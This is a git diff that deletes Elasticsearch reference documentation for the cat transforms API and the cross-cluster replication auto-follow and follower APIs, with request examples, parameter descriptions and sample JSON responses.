a/docs/reference/cat/transforms.asciidoc b/docs/reference/cat/transforms.asciidoc deleted file mode 100644 index 947bfdd81aa..00000000000 --- a/docs/reference/cat/transforms.asciidoc +++ /dev/null @@ -1,195 +0,0 @@ -[[cat-transforms]] -=== cat {transforms} API -++++ -cat transforms -++++ - -Returns configuration and usage information about {transforms}. - -[[cat-transforms-api-request]] -==== {api-request-title} - -`GET /_cat/transforms/` + - -`GET /_cat/transforms/_all` + - -`GET /_cat/transforms/*` + - -`GET /_cat/transforms` - -[[cat-transforms-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_transform` -cluster privileges to use this API. The built-in `transform_user` role has these -privileges. For more information, see <> and -<>. - -//[[cat-transforms-api-desc]] -//==== {api-description-title} - -[[cat-transforms-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=transform-id-wildcard] - -[[cat-transforms-api-query-params]] -==== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-match-transforms1] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -`from`:: -(Optional, integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from-transforms] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ -If you do not specify which columns to include, the API returns the default -columns. If you explicitly specify one or more columns, it returns only the -specified columns. -+ -Valid columns are: - -`changes_last_detection_time`, `cldt`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=checkpointing-changes-last-detected-at] - -`checkpoint_duration_time_exp_avg`, `cdtea`, `checkpointTimeExpAvg`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=exponential-avg-checkpoint-duration-ms] - -`create_time`, `ct`, `createTime`::: -(Default) -The time the {transform} was created. - -`description`, `d`::: -(Default) -The description of the {transform}. - -`dest_index`, `di`, `destIndex`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=dest-index] - -`documents_indexed`, `doci`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-indexed] - -`docs_per_second`, `dps`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=transform-settings-docs-per-second] - -`documents_processed`, `docp`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-processed] - -`frequency`, `f`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=frequency] - -`id`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=transform-id] - -`index_failure`, `if`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-failures] - -`index_time`, `itime`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-time-ms] - -`index_total`, `it`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-total] - -`indexed_documents_exp_avg`, `idea`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=exponential-avg-documents-indexed] - -`max_page_search_size`, `mpsz`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=transform-settings-max-page-search-size] - -`pages_processed`, `pp`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pages-processed] - -`pipeline`, `p`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=dest-pipeline] - -`processed_documents_exp_avg`, `pdea`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=exponential-avg-documents-processed] - -`processing_time`, `pt`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=processing-time-ms] - -`reason`, `r`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=state-transform-reason] - -`search_failure`, `sf`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-failures] - -`search_time`, `stime`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-time-ms] - -`search_total`, `st`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-total] - -`source_index`, `si`, `sourceIndex`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source-index-transforms] - -`state`, `s`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=state-transform] - -`transform_type`, `tt`::: -(Default) -Indicates the type of {transform}: `batch` or `continuous`. - -`trigger_count`, `tc`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=trigger-count] - -`version`, `v`::: -(Default) -The version of {es} that existed on the node when the {transform} was -created. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -`size`:: -(Optional, integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=size-transforms] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -[[cat-transforms-api-examples]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/transforms?v=true&format=json --------------------------------------------------- -// TEST[skip:kibana sample data] - -[source,console-result] ----- -[ - { - "id" : "ecommerce_transform", - "create_time" : "2020-03-20T20:31:25.077Z", - "version" : "7.7.0", - "source_index" : "kibana_sample_data_ecommerce", - "dest_index" : "kibana_sample_data_ecommerce_transform", - "pipeline" : null, - "description" : "Maximum priced ecommerce data by customer_id in Asia", - "transform_type" : "continuous", - "frequency" : "5m", - "max_page_search_size" : "500", - "state" : "STARTED" - } -] ----- -// TESTRESPONSE[skip:kibana sample data] diff --git a/docs/reference/ccr/apis/auto-follow/delete-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/delete-auto-follow-pattern.asciidoc deleted file mode 100644 index 602910bdda4..00000000000 --- a/docs/reference/ccr/apis/auto-follow/delete-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-delete-auto-follow-pattern]] -=== Delete auto-follow pattern API -++++ -Delete auto-follow pattern -++++ - -Delete auto-follow patterns. - -[[ccr-delete-auto-follow-pattern-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index" - ], - "follow_index_pattern" : "{{leader_index}}-follower" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/ --------------------------------------------------- -// TEST[s//my_auto_follow_pattern/] - -[[ccr-delete-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-delete-auto-follow-pattern-desc]] -==== {api-description-title} - -This API deletes a configured collection of -<>. - -[[ccr-delete-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Specifies the auto-follow pattern collection to delete. - - -[[ccr-delete-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example deletes an auto-follow pattern collection named -`my_auto_follow_pattern`: - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST[setup:remote_cluster] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/auto-follow/get-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/get-auto-follow-pattern.asciidoc deleted file mode 100644 index 5ea23782e19..00000000000 --- a/docs/reference/ccr/apis/auto-follow/get-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-get-auto-follow-pattern]] -=== Get auto-follow pattern API -++++ -Get auto-follow pattern -++++ - -Get auto-follow patterns. - -[[ccr-get-auto-follow-pattern-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index*" - ], - "follow_index_pattern" : "{{leader_index}}-follower" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_ccr/auto_follow/ --------------------------------------------------- - -[source,console] --------------------------------------------------- -GET /_ccr/auto_follow/ --------------------------------------------------- -// TEST[s//my_auto_follow_pattern/] - -[[ccr-get-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-get-auto-follow-pattern-desc]] -==== {api-description-title} - -This API gets configured <>. -This API will return the specified auto-follow pattern collection. - -[[ccr-get-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} - -``:: - (Optional, string) Specifies the auto-follow pattern collection that you want - to retrieve. If you do not specify a name, the API returns information for all - collections. - -[[ccr-get-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example retrieves information about an auto-follow pattern collection -named `my_auto_follow_pattern`: - -[source,console] --------------------------------------------------- -GET /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST[setup:remote_cluster] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "patterns": [ - { - "name": "my_auto_follow_pattern", - "pattern": { - "active": true, - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index*" - ], - "follow_index_pattern" : "{{leader_index}}-follower" - } - } - ] -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/auto-follow/pause-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/pause-auto-follow-pattern.asciidoc deleted file mode 100644 index c00dd3db549..00000000000 --- a/docs/reference/ccr/apis/auto-follow/pause-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-pause-auto-follow-pattern]] -=== Pause auto-follow pattern API -++++ -Pause auto-follow pattern -++++ - -Pauses an auto-follow pattern. - -[[ccr-pause-auto-follow-pattern-request]] -==== {api-request-title} - -`POST /_ccr/auto_follow//pause` - -[[ccr-pause-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-pause-auto-follow-pattern-desc]] -==== {api-description-title} - -This API pauses an <>. When this API returns, the auto-follow pattern -is inactive and ignores any new index created on the remote cluster that matches any of -the auto-follow's patterns. Paused auto-follow patterns appear with the `active` field -set to `false` in the <>. - -You can resume auto-following with the <>. -Once resumed, the auto-follow pattern is active again and automatically configure -follower indices for newly created indices on the remote cluster that match its patterns. -Remote indices created while the -pattern was paused will also be followed, unless they have been deleted or closed in the -meantime. - -[[ccr-pause-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Name of the auto-follow pattern to pause. - - -[[ccr-pause-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example pauses an auto-follow pattern named `my_auto_follow_pattern`: -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index" - ], - "follow_index_pattern" : "{{leader_index}}-follower" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /_ccr/auto_follow/my_auto_follow_pattern/pause --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/auto-follow/put-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/put-auto-follow-pattern.asciidoc deleted file mode 100644 index cd30494de10..00000000000 --- a/docs/reference/ccr/apis/auto-follow/put-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,131 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-put-auto-follow-pattern]] -=== Create auto-follow pattern API -++++ -Create auto-follow pattern -++++ - -Creates an auto-follow pattern. - -[[ccr-put-auto-follow-pattern-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/ -{ - "remote_cluster" : "", - "leader_index_patterns" : - [ - "" - ], - "follow_index_pattern" : "" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TEST[s//auto_follow_pattern_name/] -// TEST[s//remote_cluster/] -// TEST[s//leader_index*/] -// TEST[s//{{leader_index}}-follower/] - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/auto_follow_pattern_name --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[[ccr-put-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `read` and `monitor` -index privileges for the leader index patterns. You must also have `manage_ccr` -cluster privileges on the cluster that contains the follower index. For more -information, see <>. - -[[ccr-put-auto-follow-pattern-desc]] -==== {api-description-title} - -This API creates a new named collection of -<> against the remote cluster -specified in the request body. Newly created indices on the remote cluster -matching any of the specified patterns will be automatically configured as follower -indices. - -[[ccr-put-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} -``:: - (Required, string) The name of the collection of auto-follow patterns. - -[[ccr-put-auto-follow-pattern-request-body]] -==== {api-request-body-title} - -`remote_cluster`:: - (Required, string) The <> containing - the leader indices to match against. - -`leader_index_patterns`:: - (Optional, array) An array of simple index patterns to match against indices - in the remote cluster specified by the `remote_cluster` field. - -`follow_index_pattern`:: - (Optional, string) The name of follower index. The template `{{leader_index}}` - can be used to derive the name of the follower index from the name of the - leader index. - -include::../follow-request-body.asciidoc[] - -[[ccr-put-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example creates an auto-follow pattern named `my_auto_follow_pattern`: - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index*" - ], - "follow_index_pattern" : "{{leader_index}}-follower", - "settings": { - "index.number_of_replicas": 0 - }, - "max_read_request_operation_count" : 1024, - "max_outstanding_read_requests" : 16, - "max_read_request_size" : "1024k", - "max_write_request_operation_count" : 32768, - "max_write_request_size" : "16k", - "max_outstanding_write_requests" : 8, - "max_write_buffer_count" : 512, - "max_write_buffer_size" : "512k", - "max_retry_delay" : "10s", - "read_poll_timeout" : "30s" -} --------------------------------------------------- -// TEST[setup:remote_cluster] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST[continued] - -////////////////////////// diff --git a/docs/reference/ccr/apis/auto-follow/resume-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/resume-auto-follow-pattern.asciidoc deleted file mode 100644 index b7a26e60d32..00000000000 --- a/docs/reference/ccr/apis/auto-follow/resume-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-resume-auto-follow-pattern]] -=== Resume auto-follow pattern API -++++ -Resume auto-follow pattern -++++ - -Resumes an auto-follow pattern. - -[[ccr-resume-auto-follow-pattern-request]] -==== {api-request-title} - -`POST /_ccr/auto_follow//resume` - -[[ccr-resume-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-resume-auto-follow-pattern-desc]] -==== {api-description-title} - -This API resumes an <> that has been paused with the -<>. When this API -returns, the auto-follow pattern will resume configuring following indices for -newly created indices on the remote cluster that match its patterns. Remote -indices created while the pattern was paused will also be followed, unless they -have been deleted or closed in the meantime. - -[[ccr-resume-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Specifies the name of the auto-follow pattern to resume. - - -[[ccr-resume-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example resumes the activity of a paused auto-follow pattern -named `my_auto_follow_pattern`: -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index" - ], - "follow_index_pattern" : "{{leader_index}}-follower" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST -// TEARDOWN - -[source,console] --------------------------------------------------- -POST /_ccr/auto_follow/my_auto_follow_pattern/pause --------------------------------------------------- -// TEST - -////////////////////////// -[source,console] --------------------------------------------------- -POST /_ccr/auto_follow/my_auto_follow_pattern/resume --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/ccr-apis.asciidoc b/docs/reference/ccr/apis/ccr-apis.asciidoc deleted file mode 100644 index dea1f1603e4..00000000000 --- a/docs/reference/ccr/apis/ccr-apis.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-apis]] -== {ccr-cap} APIs - -You can use the following APIs to perform {ccr} operations. - -[discrete] -[[ccr-api-top-level]] -=== Top-Level - -* <> - -[discrete] -[[ccr-api-follow]] -=== Follow - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[ccr-api-auto-follow]] -=== Auto-follow - -* <> -* <> -* <> -* <> -* <> - -// top-level -include::get-ccr-stats.asciidoc[] - -// follow -include::follow/put-follow.asciidoc[] -include::follow/post-pause-follow.asciidoc[] -include::follow/post-resume-follow.asciidoc[] -include::follow/post-unfollow.asciidoc[] -include::follow/post-forget-follower.asciidoc[] -include::follow/get-follow-stats.asciidoc[] -include::follow/get-follow-info.asciidoc[] - -// auto-follow -include::auto-follow/put-auto-follow-pattern.asciidoc[] -include::auto-follow/delete-auto-follow-pattern.asciidoc[] -include::auto-follow/get-auto-follow-pattern.asciidoc[] -include::auto-follow/pause-auto-follow-pattern.asciidoc[] -include::auto-follow/resume-auto-follow-pattern.asciidoc[] diff --git a/docs/reference/ccr/apis/follow-request-body.asciidoc b/docs/reference/ccr/apis/follow-request-body.asciidoc deleted file mode 100644 index e474f272246..00000000000 --- a/docs/reference/ccr/apis/follow-request-body.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[testenv="platinum"] -`settings`:: - (object) Settings to override from the leader index. Note that certain - settings can not be overrode (e.g., `index.number_of_shards`). - -`max_read_request_operation_count`:: - (integer) The maximum number of operations to pull per read from the remote - cluster. - -`max_outstanding_read_requests`:: - (long) The maximum number of outstanding reads requests from the remote - cluster. - -`max_read_request_size`:: - (<>) The maximum size in bytes of per read of a batch - of operations pulled from the remote cluster. - -`max_write_request_operation_count`:: - (integer) The maximum number of operations per bulk write request executed on - the follower. - -`max_write_request_size`:: - (<>) The maximum total bytes of operations per bulk write request - executed on the follower. - -`max_outstanding_write_requests`:: - (integer) The maximum number of outstanding write requests on the follower. - -`max_write_buffer_count`:: - (integer) The maximum number of operations that can be queued for writing. - When this limit is reached, reads from the remote cluster will be deferred - until the number of queued operations goes below the limit. - -`max_write_buffer_size`:: - (<>) The maximum total bytes of operations that can be - queued for - writing. When this limit is reached, reads from the remote cluster will be - deferred until the total bytes of queued operations goes below the limit. - -`max_retry_delay`:: - (<>) The maximum time to wait before retrying an - operation that failed exceptionally. An exponential backoff strategy is - employed when retrying. - -`read_poll_timeout`:: - (<>) The maximum time to wait for new operations on the - remote cluster when the follower index is synchronized with the leader index. - When the timeout has elapsed, the poll for operations will return to the - follower so that it can update some statistics. Then the follower will - immediately attempt to read from the leader again. - -===== Default values - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -[source,console] --------------------------------------------------- -GET /follower_index/_ccr/info?filter_path=follower_indices.parameters --------------------------------------------------- - -////////////////////////// - -The following output from the follow info api describes all the default -values for the above described index follow request parameters: - -[source,console-result] --------------------------------------------------- -{ - "follower_indices" : [ - { - "parameters" : { - "max_read_request_operation_count" : 5120, - "max_read_request_size" : "32mb", - "max_outstanding_read_requests" : 12, - "max_write_request_operation_count" : 5120, - "max_write_request_size" : "9223372036854775807b", - "max_outstanding_write_requests" : 9, - "max_write_buffer_count" : 2147483647, - "max_write_buffer_size" : "512mb", - "max_retry_delay" : "500ms", - "read_poll_timeout" : "1m" - } - } - ] -} - --------------------------------------------------- diff --git a/docs/reference/ccr/apis/follow/get-follow-info.asciidoc b/docs/reference/ccr/apis/follow/get-follow-info.asciidoc deleted file mode 100644 index f98cf0f281a..00000000000 --- a/docs/reference/ccr/apis/follow/get-follow-info.asciidoc +++ /dev/null @@ -1,199 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-get-follow-info]] -=== Get follower info API -++++ -Get follower info -++++ - -Retrieves information about all follower indices. - -[[ccr-get-follow-info-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] -////////////////////////// - -[source,console] --------------------------------------------------- -GET //_ccr/info --------------------------------------------------- -// TEST[s//follower_index/] - -[[ccr-get-follow-info-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor` cluster -privileges. For more information, see <>. - -[[ccr-get-follow-info-desc]] -==== {api-description-title} - -This API lists the parameters and the status for each follower index. -For example, the results include follower index names, leader index names, -replication options and whether the follower indices are active or paused. - -[[ccr-get-follow-info-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) A comma-delimited list of follower index patterns. - -[role="child_attributes"] -[[ccr-get-follow-info-response-body]] -==== {api-response-body-title} - -//Begin follower_indices -`follower_indices`:: -(array) An array of follower index statistics. -+ -.Properties of objects in `follower_indices` -[%collapsible%open] -==== -`follower_index`:: -(string) The name of the follower index. - -`leader_index`:: -(string) The name of the index in the leader cluster that is followed. - -//Begin parameters -`parameters`:: -(object) An object that encapsulates {ccr} parameters. If the follower index's `status` is `paused`, -this object is omitted. -+ -.Properties of `parameters` -[%collapsible%open] -===== -`max_outstanding_read_requests`:: -(long) The maximum number of outstanding read requests from the remote cluster. - -`max_outstanding_write_requests`:: -(integer) The maximum number of outstanding write requests on the follower. - -`max_read_request_operation_count`:: -(integer) The maximum number of operations to pull per read from the remote -cluster. - -`max_read_request_size`:: -(<>) The maximum size in bytes of per read of a batch of -operations pulled from the remote cluster. - -`max_retry_delay`:: -(<>) The maximum time to wait before retrying an -operation that failed exceptionally. An exponential backoff strategy is employed -when retrying. - -`max_write_buffer_count`:: -(integer) The maximum number of operations that can be queued for writing. When -this limit is reached, reads from the remote cluster are deferred until the -number of queued operations goes below the limit. - -`max_write_buffer_size`:: -(<>) The maximum total bytes of operations that can be -queued for writing. When this limit is reached, reads from the remote cluster -are deferred until the total bytes of queued operations goes below the limit. - -`max_write_request_operation_count`:: -(integer) The maximum number of operations per bulk write request executed on -the follower. - -`max_write_request_size`:: -(<>) The maximum total bytes of operations per bulk write -request executed on the follower. - -`read_poll_timeout`:: -(<>) The maximum time to wait for new operations on the -remote cluster when the follower index is synchronized with the leader index. -When the timeout has elapsed, the poll for operations returns to the follower so -that it can update some statistics, then the follower immediately attempts -to read from the leader again. -===== -//End parameters - -`remote_cluster`:: -(string) The <> that contains the -leader index. - -`status`:: -(string) Whether index following is `active` or `paused`. -==== -//End follower_indices - -[[ccr-get-follow-info-examples]] -==== {api-examples-title} - -This example retrieves follower info: - -[source,console] --------------------------------------------------- -GET /follower_index/_ccr/info --------------------------------------------------- - -If the follower index is `active`, the API returns the following results: - -[source,console-result] --------------------------------------------------- -{ - "follower_indices": [ - { - "follower_index": "follower_index", - "remote_cluster": "remote_cluster", - "leader_index": "leader_index", - "status": "active", - "parameters": { - "max_read_request_operation_count": 5120, - "max_read_request_size": "32mb", - "max_outstanding_read_requests": 12, - "max_write_request_operation_count": 5120, - "max_write_request_size": "9223372036854775807b", - "max_outstanding_write_requests": 9, - "max_write_buffer_count": 2147483647, - "max_write_buffer_size": "512mb", - "max_retry_delay": "500ms", - "read_poll_timeout": "1m" - } - } - ] -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEST[continued] - -[source,console] --------------------------------------------------- -GET /follower_index/_ccr/info --------------------------------------------------- -// TEST[continued] -//// - -If the follower index is `paused`, the API returns the following results: - -[source,console-result] --------------------------------------------------- -{ - "follower_indices": [ - { - "follower_index": "follower_index", - "remote_cluster": "remote_cluster", - "leader_index": "leader_index", - "status": "paused" - } - ] -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/follow/get-follow-stats.asciidoc b/docs/reference/ccr/apis/follow/get-follow-stats.asciidoc deleted file mode 100644 index c3017d74bd8..00000000000 --- a/docs/reference/ccr/apis/follow/get-follow-stats.asciidoc +++ /dev/null @@ -1,281 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-get-follow-stats]] -=== Get follower stats API -++++ -Get follower stats -++++ - -Get follower stats. - -[[ccr-get-follow-stats-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET //_ccr/stats --------------------------------------------------- -// TEST[s//follower_index/] - -[[ccr-get-follow-stats-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-get-follow-stats-desc]] -==== {api-description-title} - -This API gets follower stats. This API will return shard-level stats about the -following tasks associated with each shard for the specified indices. - -[[ccr-get-follow-stats-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) A comma-delimited list of index patterns. - -[role="child_attributes"] -[[ccr-get-follow-stats-response-body]] -==== {api-response-body-title} - -//Begin indices -`indices`:: -(array) An array of follower index statistics. -+ -.Properties of `indices` -[%collapsible%open] -==== -`fatal_exception`:: -(object) An object representing a fatal exception that cancelled the following -task. In this situation, the following task must be resumed manually with the -<>. - -`index`:: -(string) The name of the follower index. - -//Begin shards -`shards`:: -(array) An array of shard-level following task statistics. -+ -.Properties of objects in `shards` -[%collapsible%open] -===== -`bytes_read`:: -(long) The total of transferred bytes read from the leader. -+ --- -NOTE: This is only an estimate and does not account for compression if enabled. - --- - -`failed_read_requests`:: -(long) The number of failed reads. - -failed_write_requests`:: -(long) The number of failed bulk write requests executed on the follower. - -`follower_aliases_version`:: -(long) The index aliases version the follower is synced up to. - -`follower_global_checkpoint`:: -(long) The current global checkpoint on the follower. The difference between the -`leader_global_checkpoint` and the `follower_global_checkpoint` is an -indication of how much the follower is lagging the leader. - -`follower_index`:: -(string) The name of the follower index. - -`follower_mapping_version`:: -(long) The mapping version the follower is synced up to. - -`follower_max_seq_no`:: -(long) The current maximum sequence number on the follower. - -`follower_settings_version`:: -(long) The index settings version the follower is synced up to. - -`last_requested_seq_no`:: -(long) The starting sequence number of the last batch of operations requested -from the leader. - -`leader_global_checkpoint`:: -(long) The current global checkpoint on the leader known to the follower task. - -`leader_index`:: -(string) The name of the index in the leader cluster being followed. - -`leader_max_seq_no`:: -(long) The current maximum sequence number on the leader known to the follower -task. - -`operations_read`:: -(long) The total number of operations read from the leader. - -operations_written`:: -(long) The number of operations written on the follower. - -`outstanding_read_requests`:: -(integer) The number of active read requests from the follower. - -`outstanding_write_requests`:: -(integer) The number of active bulk write requests on the follower. - -//Begin read_exceptions -`read_exceptions`:: -(array) An array of objects representing failed reads. -+ -.Properties of objects in `read_exceptions` -[%collapsible%open] -====== -`exception`:: -(object) Represents the exception that caused the read to fail. - -`from_seq_no`:: -(long) The starting sequence number of the batch requested from the leader. - -`retries`:: -(integer) The number of times the batch has been retried. -====== -//End read_exceptions - -`remote_cluster`:: -(string) The <> containing the leader -index. - -`shard_id`:: -(integer) The numerical shard ID, with values from 0 to one less than the -number of replicas. - -`successful_read_requests`:: -(long) The number of successful fetches. - -`successful_write_requests`:: -(long) The number of bulk write requests executed on the follower. - -`time_since_last_read_millis`:: -(long) The number of milliseconds since a read request was sent to the leader. -+ -NOTE: When the follower is caught up to the leader, this number will increase up -to the configured `read_poll_timeout` at which point another read request will -be sent to the leader. - 